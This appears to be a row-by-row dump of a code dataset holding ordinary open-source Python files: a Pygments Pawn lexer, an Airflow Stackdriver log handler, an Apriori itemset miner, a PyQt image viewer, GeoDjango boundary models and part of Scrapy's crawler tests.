repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
facelessuser/sublime-markdown-popups
|
st3/mdpopups/pygments/lexers/pawn.py
|
1
|
8073
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.pawn
~~~~~~~~~~~~~~~~~~~~
Lexers for the Pawn languages.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from ..lexer import RegexLexer
from ..token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Error
from ..util import get_bool_opt
__all__ = ['SourcePawnLexer', 'PawnLexer']
class SourcePawnLexer(RegexLexer):
"""
For SourcePawn source code with preprocessor directives.
.. versionadded:: 1.6
"""
name = 'SourcePawn'
aliases = ['sp']
filenames = ['*.sp']
mimetypes = ['text/x-sourcepawn']
#: optional Comment or Whitespace
_ws = r'(?:\s|//.*?\n|/\*.*?\*/)+'
#: only one /* */ style comment
_ws1 = r'\s*(?:/[*].*?[*]/\s*)*'
tokens = {
'root': [
# preprocessor directives: without whitespace
('^#if\s+0', Comment.Preproc, 'if0'),
('^#', Comment.Preproc, 'macro'),
# or with whitespace
('^' + _ws1 + r'#if\s+0', Comment.Preproc, 'if0'),
('^' + _ws1 + '#', Comment.Preproc, 'macro'),
(r'\n', Text),
(r'\s+', Text),
(r'\\\n', Text), # line continuation
(r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single),
(r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline),
(r'[{}]', Punctuation),
(r'L?"', String, 'string'),
(r"L?'(\\.|\\[0-7]{1,3}|\\x[a-fA-F0-9]{1,2}|[^\\\'\n])'", String.Char),
(r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float),
(r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float),
(r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex),
(r'0[0-7]+[LlUu]*', Number.Oct),
(r'\d+[LlUu]*', Number.Integer),
(r'\*/', Error),
(r'[~!%^&*+=|?:<>/-]', Operator),
(r'[()\[\],.;]', Punctuation),
(r'(case|const|continue|native|'
r'default|else|enum|for|if|new|operator|'
r'public|return|sizeof|static|decl|struct|switch)\b', Keyword),
(r'(bool|Float)\b', Keyword.Type),
(r'(true|false)\b', Keyword.Constant),
('[a-zA-Z_]\w*', Name),
],
'string': [
(r'"', String, '#pop'),
(r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape),
(r'[^\\"\n]+', String), # all other characters
(r'\\\n', String), # line continuation
(r'\\', String), # stray backslash
],
'macro': [
(r'[^/\n]+', Comment.Preproc),
(r'/\*(.|\n)*?\*/', Comment.Multiline),
(r'//.*?\n', Comment.Single, '#pop'),
(r'/', Comment.Preproc),
(r'(?<=\\)\n', Comment.Preproc),
(r'\n', Comment.Preproc, '#pop'),
],
'if0': [
(r'^\s*#if.*?(?<!\\)\n', Comment.Preproc, '#push'),
(r'^\s*#endif.*?(?<!\\)\n', Comment.Preproc, '#pop'),
(r'.*?\n', Comment),
]
}
SM_TYPES = set(('Action', 'bool', 'Float', 'Plugin', 'String', 'any',
'AdminFlag', 'OverrideType', 'OverrideRule', 'ImmunityType',
'GroupId', 'AdminId', 'AdmAccessMode', 'AdminCachePart',
'CookieAccess', 'CookieMenu', 'CookieMenuAction', 'NetFlow',
'ConVarBounds', 'QueryCookie', 'ReplySource',
'ConVarQueryResult', 'ConVarQueryFinished', 'Function',
'Action', 'Identity', 'PluginStatus', 'PluginInfo', 'DBResult',
'DBBindType', 'DBPriority', 'PropType', 'PropFieldType',
'MoveType', 'RenderMode', 'RenderFx', 'EventHookMode',
'EventHook', 'FileType', 'FileTimeMode', 'PathType',
'ParamType', 'ExecType', 'DialogType', 'Handle', 'KvDataTypes',
'NominateResult', 'MapChange', 'MenuStyle', 'MenuAction',
'MenuSource', 'RegexError', 'SDKCallType', 'SDKLibrary',
'SDKFuncConfSource', 'SDKType', 'SDKPassMethod', 'RayType',
'TraceEntityFilter', 'ListenOverride', 'SortOrder', 'SortType',
'SortFunc2D', 'APLRes', 'FeatureType', 'FeatureStatus',
'SMCResult', 'SMCError', 'TFClassType', 'TFTeam', 'TFCond',
'TFResourceType', 'Timer', 'TopMenuAction', 'TopMenuObjectType',
'TopMenuPosition', 'TopMenuObject', 'UserMsg'))
def __init__(self, **options):
self.smhighlighting = get_bool_opt(options,
'sourcemod', True)
self._functions = set()
if self.smhighlighting:
from pygments.lexers._sourcemod_builtins import FUNCTIONS
self._functions.update(FUNCTIONS)
RegexLexer.__init__(self, **options)
def get_tokens_unprocessed(self, text):
for index, token, value in \
RegexLexer.get_tokens_unprocessed(self, text):
if token is Name:
if self.smhighlighting:
if value in self.SM_TYPES:
token = Keyword.Type
elif value in self._functions:
token = Name.Builtin
yield index, token, value
class PawnLexer(RegexLexer):
"""
For Pawn source code.
.. versionadded:: 2.0
"""
name = 'Pawn'
aliases = ['pawn']
filenames = ['*.p', '*.pwn', '*.inc']
mimetypes = ['text/x-pawn']
#: optional Comment or Whitespace
_ws = r'(?:\s|//.*?\n|/[*][\w\W]*?[*]/)+'
#: only one /* */ style comment
_ws1 = r'\s*(?:/[*].*?[*]/\s*)*'
tokens = {
'root': [
# preprocessor directives: without whitespace
('^#if\s+0', Comment.Preproc, 'if0'),
('^#', Comment.Preproc, 'macro'),
# or with whitespace
('^' + _ws1 + r'#if\s+0', Comment.Preproc, 'if0'),
('^' + _ws1 + '#', Comment.Preproc, 'macro'),
(r'\n', Text),
(r'\s+', Text),
(r'\\\n', Text), # line continuation
(r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single),
(r'/(\\\n)?\*[\w\W]*?\*(\\\n)?/', Comment.Multiline),
(r'[{}]', Punctuation),
(r'L?"', String, 'string'),
(r"L?'(\\.|\\[0-7]{1,3}|\\x[a-fA-F0-9]{1,2}|[^\\\'\n])'", String.Char),
(r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float),
(r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float),
(r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex),
(r'0[0-7]+[LlUu]*', Number.Oct),
(r'\d+[LlUu]*', Number.Integer),
(r'\*/', Error),
(r'[~!%^&*+=|?:<>/-]', Operator),
(r'[()\[\],.;]', Punctuation),
(r'(switch|case|default|const|new|static|char|continue|break|'
r'if|else|for|while|do|operator|enum|'
r'public|return|sizeof|tagof|state|goto)\b', Keyword),
(r'(bool|Float)\b', Keyword.Type),
(r'(true|false)\b', Keyword.Constant),
('[a-zA-Z_]\w*', Name),
],
'string': [
(r'"', String, '#pop'),
(r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape),
(r'[^\\"\n]+', String), # all other characters
(r'\\\n', String), # line continuation
(r'\\', String), # stray backslash
],
'macro': [
(r'[^/\n]+', Comment.Preproc),
(r'/\*(.|\n)*?\*/', Comment.Multiline),
(r'//.*?\n', Comment.Single, '#pop'),
(r'/', Comment.Preproc),
(r'(?<=\\)\n', Comment.Preproc),
(r'\n', Comment.Preproc, '#pop'),
],
'if0': [
(r'^\s*#if.*?(?<!\\)\n', Comment.Preproc, '#push'),
(r'^\s*#endif.*?(?<!\\)\n', Comment.Preproc, '#pop'),
(r'.*?\n', Comment),
]
}
|
mit
| -358,244,456,042,769,800 | 39.567839 | 84 | 0.445559 | false | 3.447054 | false | false | false |
wooga/airflow
|
airflow/utils/log/stackdriver_task_handler.py
|
1
|
11730
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Handler that integrates with Stackdriver
"""
import logging
from typing import Dict, List, Optional, Tuple, Type
from cached_property import cached_property
from google.api_core.gapic_v1.client_info import ClientInfo
from google.cloud import logging as gcp_logging
from google.cloud.logging.handlers.transports import BackgroundThreadTransport, Transport
from google.cloud.logging.resource import Resource
from airflow import version
from airflow.models import TaskInstance
DEFAULT_LOGGER_NAME = "airflow"
_GLOBAL_RESOURCE = Resource(type="global", labels={})
class StackdriverTaskHandler(logging.Handler):
"""Handler that directly makes Stackdriver logging API calls.
This is a Python standard ``logging`` handler using that can be used to
route Python standard logging messages directly to the Stackdriver
Logging API.
It can also be used to save logs for executing tasks. To do this, you should set as a handler with
the name "tasks". In this case, it will also be used to read the log for display in Web UI.
This handler supports both an asynchronous and synchronous transport.
:param gcp_conn_id: Connection ID that will be used for authorization to the Google Cloud Platform.
If omitted, authorization based on `the Application Default Credentials
<https://cloud.google.com/docs/authentication/production#finding_credentials_automatically>`__ will
be used.
:type gcp_conn_id: str
:param name: the name of the custom log in Stackdriver Logging. Defaults
to 'airflow'. The name of the Python logger will be represented
in the ``python_logger`` field.
:type name: str
:param transport: Class for creating new transport objects. It should
extend from the base :class:`google.cloud.logging.handlers.Transport` type and
implement :meth`google.cloud.logging.handlers.Transport.send`. Defaults to
:class:`google.cloud.logging.handlers.BackgroundThreadTransport`. The other
option is :class:`google.cloud.logging.handlers.SyncTransport`.
:type transport: :class:`type`
:param resource: (Optional) Monitored resource of the entry, defaults
to the global resource type.
:type resource: :class:`~google.cloud.logging.resource.Resource`
:param labels: (Optional) Mapping of labels for the entry.
:type labels: dict
"""
LABEL_TASK_ID = "task_id"
LABEL_DAG_ID = "dag_id"
LABEL_EXECUTION_DATE = "execution_date"
LABEL_TRY_NUMBER = "try_number"
def __init__(
self,
gcp_conn_id: Optional[str] = None,
name: str = DEFAULT_LOGGER_NAME,
transport: Type[Transport] = BackgroundThreadTransport,
resource: Resource = _GLOBAL_RESOURCE,
labels: Optional[Dict[str, str]] = None,
):
super().__init__()
self.gcp_conn_id = gcp_conn_id
self.name: str = name
self.transport_type: Type[Transport] = transport
self.resource: Resource = resource
self.labels: Optional[Dict[str, str]] = labels
self.task_instance_labels: Optional[Dict[str, str]] = {}
@cached_property
def _client(self) -> gcp_logging.Client:
"""Google Cloud Library API client"""
if self.gcp_conn_id:
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
hook = GoogleBaseHook(gcp_conn_id=self.gcp_conn_id)
credentials = hook._get_credentials() # pylint: disable=protected-access
else:
# Use Application Default Credentials
credentials = None
client = gcp_logging.Client(
credentials=credentials,
client_info=ClientInfo(client_library_version='airflow_v' + version.version)
)
return client
@cached_property
def _transport(self) -> Transport:
"""Object responsible for sending data to Stackdriver"""
return self.transport_type(self._client, self.name)
def emit(self, record: logging.LogRecord) -> None:
"""Actually log the specified logging record.
:param record: The record to be logged.
:type record: logging.LogRecord
"""
message = self.format(record)
labels: Optional[Dict[str, str]]
if self.labels and self.task_instance_labels:
labels = {}
labels.update(self.labels)
labels.update(self.task_instance_labels)
elif self.labels:
labels = self.labels
elif self.task_instance_labels:
labels = self.task_instance_labels
else:
labels = None
self._transport.send(record, message, resource=self.resource, labels=labels)
def set_context(self, task_instance: TaskInstance) -> None:
"""
Configures the logger to add information with information about the current task
:param task_instance: Currently executed task
:type task_instance: TaskInstance
"""
self.task_instance_labels = self._task_instance_to_labels(task_instance)
def read(
self, task_instance: TaskInstance, try_number: Optional[int] = None, metadata: Optional[Dict] = None
) -> Tuple[List[str], List[Dict]]:
"""
Read logs of given task instance from Stackdriver logging.
:param task_instance: task instance object
:type: task_instance: TaskInstance
:param try_number: task instance try_number to read logs from. If None
it returns all logs
:type try_number: Optional[int]
:param metadata: log metadata. It is used for steaming log reading and auto-tailing.
:type metadata: Dict
:return: a tuple of list of logs and list of metadata
:rtype: Tuple[List[str], List[Dict]]
"""
if try_number is not None and try_number < 1:
logs = ["Error fetching the logs. Try number {} is invalid.".format(try_number)]
return logs, [{"end_of_log": "true"}]
if not metadata:
metadata = {}
ti_labels = self._task_instance_to_labels(task_instance)
if try_number is not None:
ti_labels[self.LABEL_TRY_NUMBER] = str(try_number)
else:
del ti_labels[self.LABEL_TRY_NUMBER]
log_filter = self._prepare_log_filter(ti_labels)
next_page_token = metadata.get("next_page_token", None)
all_pages = 'download_logs' in metadata and metadata['download_logs']
messages, end_of_log, next_page_token = self._read_logs(log_filter, next_page_token, all_pages)
new_metadata = {"end_of_log": end_of_log}
if next_page_token:
new_metadata['next_page_token'] = next_page_token
return [messages], [new_metadata]
def _prepare_log_filter(self, ti_labels: Dict[str, str]) -> str:
"""
Prepares the filter that chooses which log entries to fetch.
More information:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/entries/list#body.request_body.FIELDS.filter
https://cloud.google.com/logging/docs/view/advanced-queries
:param ti_labels: Task Instance's labels that will be used to search for logs
:type: Dict[str, str]
:return: logs filter
"""
def escape_label_key(key: str) -> str:
return f'"{key}"' if "." in key else key
def escale_label_value(value: str) -> str:
escaped_value = value.replace("\\", "\\\\").replace('"', '\\"')
return f'"{escaped_value}"'
log_filters = [
f'resource.type={escale_label_value(self.resource.type)}',
f'logName="projects/{self._client.project}/logs/{self.name}"'
]
for key, value in self.resource.labels.items():
log_filters.append(f'resource.labels.{escape_label_key(key)}={escale_label_value(value)}')
for key, value in ti_labels.items():
log_filters.append(f'labels.{escape_label_key(key)}={escale_label_value(value)}')
return "\n".join(log_filters)
def _read_logs(
self,
log_filter: str,
next_page_token: Optional[str],
all_pages: bool
) -> Tuple[str, bool, Optional[str]]:
"""
Sends requests to the Stackdriver service and downloads logs.
:param log_filter: Filter specifying the logs to be downloaded.
:type log_filter: str
:param next_page_token: The token of the page from which the log download will start.
If None is passed, it will start from the first page.
:param all_pages: If True is passed, all subpages will be downloaded. Otherwise, only the first
page will be downloaded
:return: A token that contains the following items:
* string with logs
* Boolean value describing whether there are more logs,
* token of the next page
:rtype: Tuple[str, bool, str]
"""
messages = []
new_messages, next_page_token = self._read_single_logs_page(
log_filter=log_filter,
page_token=next_page_token,
)
messages.append(new_messages)
if all_pages:
while next_page_token:
new_messages, next_page_token = self._read_single_logs_page(
log_filter=log_filter,
page_token=next_page_token
)
messages.append(new_messages)
end_of_log = True
next_page_token = None
else:
end_of_log = not bool(next_page_token)
return "\n".join(messages), end_of_log, next_page_token
def _read_single_logs_page(self, log_filter: str, page_token: Optional[str] = None) -> Tuple[str, str]:
"""
Sends requests to the Stackdriver service and downloads single pages with logs.
:param log_filter: Filter specifying the logs to be downloaded.
:type log_filter: str
:param page_token: The token of the page to be downloaded. If None is passed, the first page will be
downloaded.
:type page_token: str
:return: Downloaded logs and next page token
:rtype: Tuple[str, str]
"""
entries = self._client.list_entries(filter_=log_filter, page_token=page_token)
page = next(entries.pages)
next_page_token = entries.next_page_token
messages = []
for entry in page:
if "message" in entry.payload:
messages.append(entry.payload["message"])
return "\n".join(messages), next_page_token
@classmethod
def _task_instance_to_labels(cls, ti: TaskInstance) -> Dict[str, str]:
return {
cls.LABEL_TASK_ID: ti.task_id,
cls.LABEL_DAG_ID: ti.dag_id,
cls.LABEL_EXECUTION_DATE: str(ti.execution_date.isoformat()),
cls.LABEL_TRY_NUMBER: str(ti.try_number),
}
|
apache-2.0
| 2,753,684,676,931,630,600 | 40.013986 | 111 | 0.641347 | false | 4.085684 | false | false | false |
kagklis/Frequent-Itemset-Hiding-Toolbox-x86
|
Apriori.py
|
1
|
2242
|
#-------------------------------------------------------------------------------
# Name: Apriori.py
# Purpose: Mining Frequent Itemsets
# Author: Vasileios Kagklis
# Created: 10/02/2014
# Copyright: (c) Vasileios Kagklis
#-------------------------------------------------------------------------------
from __future__ import division, print_function
import os
from time import clock
from fim import apriori
from myiolib import readDataset
def printResults(fname, sup, Time, F, out_fname):
result_file=open(out_fname,'w')
visible_file=open('Apriori_visible.txt','w')
print('Apriori Execution',file=visible_file)
print('=================',file=visible_file)
print('Data Set from File:',fname,file=visible_file)
print('Support= ',sup,file=visible_file)
print('Frequent Itemsets ==> Support:',file=visible_file)
print('',file=visible_file)
print('Results:','\n',file=visible_file)
data_line=''
itemset_and_sup=''
Vis_itemset_and_sup=''
for itemset, support in F.items():
ItemSet=list(itemset)
ItemSet.sort()
for item in ItemSet:
data_line=data_line+item+' '
itemset_and_sup=data_line+(str(support))
Vis_itemset_and_sup=data_line+'==>'+(str(round(support,5)))
print(itemset_and_sup,file=result_file)
print(Vis_itemset_and_sup,file=visible_file)
data_line=''
itemset_and_sup=''
Vis_itemset_and_sup=''
print('Execution time= ',Time,file=visible_file)
visible_file.close()
result_file.close()
def convert2dic(F, N):
freq = {}
for itemset in F:
freq[frozenset(itemset[0])] = float(itemset[1][0]/N)
return freq
def convert2frozen_m(f):
result = []
for itemset in f:
result.append(frozenset(itemset[0]))
return(result)
def Apriori_main(data_fname, minSupport, out_fname='Apriori_results.txt'):
lines,tid = readDataset(data_fname)
t1=clock()
temp_freq = apriori(tid, target='s', supp=float(minSupport*100), conf=100)
CPU_time=clock()-t1
freq_items = convert2dic(temp_freq,lines)
printResults(data_fname,minSupport,CPU_time,freq_items,out_fname)
return(freq_items,CPU_time)
|
mit
| -4,553,797,885,954,154,000 | 34.03125 | 80 | 0.591436 | false | 3.376506 | false | false | false |
chiahaoliu/2016_summer_XPD
|
XPD_view/XPD_view_1.py
|
1
|
6464
|
"""
This file will contain the code to create the XPD view GUI
"""
from xray_vision.qt_widgets import CrossSectionMainWindow
from PyQt4 import QtGui, QtCore
import os
import sys
import numpy as np
from Tif_File_Finder import TifFileFinder
from plot_analysis import reducedRepPlot
def data_gen(length):
x, y = [_ * 2 * np.pi / 200 for _ in np.ogrid[-200:200, -200:200]]
rep = int(np.sqrt(length))
data = []
for idx in range(length):
kx = idx // rep + 1
ky = idx % rep
data.append(np.sin(kx * x) * np.cos(ky * y) + 1.05)
return data
class Display(QtGui.QMainWindow):
def __init__(self):
QtGui.QMainWindow.__init__(self)
self.setWindowTitle('XPD View')
self.analysis_type = None
self.file_path = None
self.key_list = ['Home']
self.data_list = data_gen(1)
self.Tif = TifFileFinder()
self._main_window = CrossSectionMainWindow(data_list=self.data_list,
key_list=self.key_list,
cmap='RdBu')
self._main_window.setFocus()
self.setCentralWidget(self._main_window)
# set path option
setpath = QtGui.QAction("&Set Directory", self)
setpath.setShortcut("Ctrl+O")
setpath.setStatusTip("Set image directory")
setpath.triggered.connect(self.set_path)
# sets up refresh button
refresh = QtGui.QAction("&Refresh Files", self)
refresh.triggered.connect(self.refresh)
# set analysis type options
select_mean = QtGui.QAction("&mean", self)
select_mean.triggered.connect(self.set_type_mean)
select_std_dev = QtGui.QAction("&standard deviation", self)
select_std_dev.triggered.connect(self.set_type_stddev)
select_min = QtGui.QAction("&min", self)
select_min.triggered.connect(self.set_type_min)
select_max = QtGui.QAction("&max", self)
select_max.triggered.connect(self.set_type_max)
select_total_intensity = QtGui.QAction("&total intensity", self)
select_total_intensity.triggered.connect(self.set_type_total)
plt_action = QtGui.QAction("&Plot", self)
plt_action.triggered.connect(self.plot_analysis)
self.statusBar()
# This sets up all of the menu widgets that are used in the GUI
mainmenu = self.menuBar()
filemenu = mainmenu.addMenu("&File")
graph_menu = mainmenu.addMenu('&Reduced Represenation')
analysis_submenu = QtGui.QMenu("analysis settings", graph_menu)
filemenu.addAction(setpath)
filemenu.addAction(refresh)
analysis_submenu.addAction(select_max)
analysis_submenu.addAction(select_min)
analysis_submenu.addAction(select_mean)
analysis_submenu.addAction(select_std_dev)
analysis_submenu.addAction(select_total_intensity)
graph_menu.addMenu(analysis_submenu)
graph_menu.addAction(plt_action)
self._main_window._messenger._ctrl_widget._spin_img.valueChanged.connect(self.thingy)
self.show()
def set_path(self):
popup = QtGui.QFileDialog()
self.file_path = str(popup.getExistingDirectory())
self.Tif._directory_name = self.file_path
self.Tif.get_file_list()
self.update_data(self.Tif.pic_list, self.Tif.file_list)
def set_type_mean(self):
self.analysis_type = "mean"
print("mean")
def set_type_min(self):
self.analysis_type = "min"
print("min")
def set_type_stddev(self):
self.analysis_type = "sigma"
print("sigma")
def set_type_max(self):
self.analysis_type = "max"
print("max")
def set_type_total(self):
self.analysis_type = "total intensity"
print("total intensity")
def plot_analysis(self):
try:
rpp = reducedRepPlot(self.data_list, 0, 400, 0, 400, self.analysis_type)
rpp.plot()
except NotADirectoryError:
print("exception excepted")
err_msg_file = QtGui.QMessageBox()
err_msg_file.setIcon(QtGui.QMessageBox.Critical)
err_msg_file.setWindowTitle("Error")
err_msg_file.setText("You did not specify a file path.")
err_msg_file.setInformativeText("click open to set the file path")
err_msg_file.setStandardButtons(QtGui.QMessageBox.Open)
err_msg_file.buttonClicked.connect(self.set_path)
err_msg_file.exec_()
except AssertionError:
err_msg_analysis = QtGui.QMessageBox()
err_msg_analysis.setIcon(QtGui.QMessageBox.Critical)
err_msg_analysis.setWindowTitle("Error")
err_msg_analysis.setText("You did not specify an analysis type")
err_msg_analysis.setInformativeText("please go to the menu and select an analysis type before proceeding")
err_msg_analysis.setStandardButtons(QtGui.QMessageBox.Close)
# err_msg_analysis.buttonClicked.connect(self.set_path)
err_msg_analysis.exec_()
def refresh(self):
new_file_names, new_data = self.Tif.get_new_files()
if len(new_file_names) == 0:
print("No new .tif files found")
else:
self.update_data(new_data, new_file_names)
def update_data(self, data_list, file_list):
# This method updates the data in the image displayer taking in some new data list and some other
# list that is normally the list of File names
old_length = len(self.key_list)
for file in file_list:
self.key_list.append(file)
for data in data_list:
self.data_list.append(data)
for i in range(old_length, len(self.key_list)):
self._main_window._messenger._view._data_dict[self.key_list[i]] = self.data_list[i]
self._main_window._messenger._ctrl_widget._slider_img.setMaximum(len(self.key_list) - 1)
self._main_window._messenger._ctrl_widget._spin_img.setMaximum(len(self.key_list) - 1)
def thingy(self, val):
print(val)
def main():
app = QtGui.QApplication(sys.argv)
viewer = Display()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
bsd-2-clause
| -7,495,527,753,662,878,000 | 35.149425 | 118 | 0.603651 | false | 3.795655 | false | false | false |
hacklabr/geodjango-boundaries
|
boundaries/models.py
|
1
|
1543
|
# -*- coding: utf-8 -*-
from django.utils.encoding import python_2_unicode_compatible
from django.contrib.gis.db import models
@python_2_unicode_compatible
class NamedModel(models.Model):
name = models.CharField(max_length=255)
geometry = models.MultiPolygonField() # Multipolygon in NAD83
objects = models.GeoManager()
class Meta:
abstract = True
def __str__(self):
return self.name
class Country(NamedModel):
iso_code = models.CharField(max_length=4, blank=True)
class State(NamedModel):
label = models.CharField(max_length=255)
acronym = models.CharField(max_length=64, blank=True, null=True)
region = models.CharField(max_length=255, blank=True, null=True)
country = models.ForeignKey(Country)
class City(NamedModel):
label = models.CharField(max_length=255)
region = models.CharField(max_length=255, blank=True, null=True)
state = models.ForeignKey(State, blank=True, null=True)
country = models.ForeignKey(Country)
cities_ibge_mapping = {
'name': 'NOME_MUNIC',
'region': 'REGIão',
'state': {'acronym': 'SIGLA'},
'geometry': 'POLYGON',
}
# Mapping dictionaries for the models above.
state_ibge_mapping = {
'acronym': 'SIGLA',
'country': {'name': 'pais'},
# 'geometry': 'MULTIPOLYGON', # Will convert POLYGON features into MULTIPOLYGONS,
'geometry': 'POLYGON',
}
country_ibge_mapping = {
'name': 'name',
'geometry': 'POLYGON',
}
argentinian_cities_mapping = {
'name': 'FNA',
'geometry': 'POLYGON'
}
|
bsd-3-clause
| 5,712,905,196,875,916,000 | 23.870968 | 86 | 0.669909 | false | 3.330454 | false | false | false |
dangra/scrapy
|
tests/test_crawler.py
|
2
|
16388
|
import logging
import os
import platform
import subprocess
import sys
import warnings
from unittest import skipIf
from pytest import raises, mark
from testfixtures import LogCapture
from twisted.internet import defer
from twisted.trial import unittest
import scrapy
from scrapy.crawler import Crawler, CrawlerRunner, CrawlerProcess
from scrapy.settings import Settings, default_settings
from scrapy.spiderloader import SpiderLoader
from scrapy.utils.log import configure_logging, get_scrapy_root_handler
from scrapy.utils.spider import DefaultSpider
from scrapy.utils.misc import load_object
from scrapy.extensions.throttle import AutoThrottle
from scrapy.extensions import telnet
from scrapy.utils.test import get_testenv
from tests.mockserver import MockServer
class BaseCrawlerTest(unittest.TestCase):
def assertOptionIsDefault(self, settings, key):
self.assertIsInstance(settings, Settings)
self.assertEqual(settings[key], getattr(default_settings, key))
class CrawlerTestCase(BaseCrawlerTest):
def setUp(self):
self.crawler = Crawler(DefaultSpider, Settings())
def test_populate_spidercls_settings(self):
spider_settings = {'TEST1': 'spider', 'TEST2': 'spider'}
project_settings = {'TEST1': 'project', 'TEST3': 'project'}
class CustomSettingsSpider(DefaultSpider):
custom_settings = spider_settings
settings = Settings()
settings.setdict(project_settings, priority='project')
crawler = Crawler(CustomSettingsSpider, settings)
self.assertEqual(crawler.settings.get('TEST1'), 'spider')
self.assertEqual(crawler.settings.get('TEST2'), 'spider')
self.assertEqual(crawler.settings.get('TEST3'), 'project')
self.assertFalse(settings.frozen)
self.assertTrue(crawler.settings.frozen)
def test_crawler_accepts_dict(self):
crawler = Crawler(DefaultSpider, {'foo': 'bar'})
self.assertEqual(crawler.settings['foo'], 'bar')
self.assertOptionIsDefault(crawler.settings, 'RETRY_ENABLED')
def test_crawler_accepts_None(self):
crawler = Crawler(DefaultSpider)
self.assertOptionIsDefault(crawler.settings, 'RETRY_ENABLED')
def test_crawler_rejects_spider_objects(self):
with raises(ValueError):
Crawler(DefaultSpider())
class SpiderSettingsTestCase(unittest.TestCase):
def test_spider_custom_settings(self):
class MySpider(scrapy.Spider):
name = 'spider'
custom_settings = {
'AUTOTHROTTLE_ENABLED': True
}
crawler = Crawler(MySpider, {})
enabled_exts = [e.__class__ for e in crawler.extensions.middlewares]
self.assertIn(AutoThrottle, enabled_exts)
class CrawlerLoggingTestCase(unittest.TestCase):
def test_no_root_handler_installed(self):
handler = get_scrapy_root_handler()
if handler is not None:
logging.root.removeHandler(handler)
class MySpider(scrapy.Spider):
name = 'spider'
Crawler(MySpider, {})
assert get_scrapy_root_handler() is None
def test_spider_custom_settings_log_level(self):
log_file = self.mktemp()
class MySpider(scrapy.Spider):
name = 'spider'
custom_settings = {
'LOG_LEVEL': 'INFO',
'LOG_FILE': log_file,
# disable telnet if not available to avoid an extra warning
'TELNETCONSOLE_ENABLED': telnet.TWISTED_CONCH_AVAILABLE,
}
configure_logging()
self.assertEqual(get_scrapy_root_handler().level, logging.DEBUG)
crawler = Crawler(MySpider, {})
self.assertEqual(get_scrapy_root_handler().level, logging.INFO)
info_count = crawler.stats.get_value('log_count/INFO')
logging.debug('debug message')
logging.info('info message')
logging.warning('warning message')
logging.error('error message')
with open(log_file, 'rb') as fo:
logged = fo.read().decode('utf8')
self.assertNotIn('debug message', logged)
self.assertIn('info message', logged)
self.assertIn('warning message', logged)
self.assertIn('error message', logged)
self.assertEqual(crawler.stats.get_value('log_count/ERROR'), 1)
self.assertEqual(crawler.stats.get_value('log_count/WARNING'), 1)
self.assertEqual(
crawler.stats.get_value('log_count/INFO') - info_count, 1)
self.assertEqual(crawler.stats.get_value('log_count/DEBUG', 0), 0)
class SpiderLoaderWithWrongInterface:
def unneeded_method(self):
pass
class CustomSpiderLoader(SpiderLoader):
pass
class CrawlerRunnerTestCase(BaseCrawlerTest):
def test_spider_manager_verify_interface(self):
settings = Settings({
'SPIDER_LOADER_CLASS': SpiderLoaderWithWrongInterface,
})
with warnings.catch_warnings(record=True) as w:
self.assertRaises(AttributeError, CrawlerRunner, settings)
self.assertEqual(len(w), 1)
self.assertIn("SPIDER_LOADER_CLASS", str(w[0].message))
self.assertIn("scrapy.interfaces.ISpiderLoader", str(w[0].message))
def test_crawler_runner_accepts_dict(self):
runner = CrawlerRunner({'foo': 'bar'})
self.assertEqual(runner.settings['foo'], 'bar')
self.assertOptionIsDefault(runner.settings, 'RETRY_ENABLED')
def test_crawler_runner_accepts_None(self):
runner = CrawlerRunner()
self.assertOptionIsDefault(runner.settings, 'RETRY_ENABLED')
def test_deprecated_attribute_spiders(self):
with warnings.catch_warnings(record=True) as w:
runner = CrawlerRunner(Settings())
spiders = runner.spiders
self.assertEqual(len(w), 1)
self.assertIn("CrawlerRunner.spiders", str(w[0].message))
self.assertIn("CrawlerRunner.spider_loader", str(w[0].message))
sl_cls = load_object(runner.settings['SPIDER_LOADER_CLASS'])
self.assertIsInstance(spiders, sl_cls)
class CrawlerProcessTest(BaseCrawlerTest):
def test_crawler_process_accepts_dict(self):
runner = CrawlerProcess({'foo': 'bar'})
self.assertEqual(runner.settings['foo'], 'bar')
self.assertOptionIsDefault(runner.settings, 'RETRY_ENABLED')
def test_crawler_process_accepts_None(self):
runner = CrawlerProcess()
self.assertOptionIsDefault(runner.settings, 'RETRY_ENABLED')
class ExceptionSpider(scrapy.Spider):
name = 'exception'
@classmethod
def from_crawler(cls, crawler, *args, **kwargs):
raise ValueError('Exception in from_crawler method')
class NoRequestsSpider(scrapy.Spider):
name = 'no_request'
def start_requests(self):
return []
@mark.usefixtures('reactor_pytest')
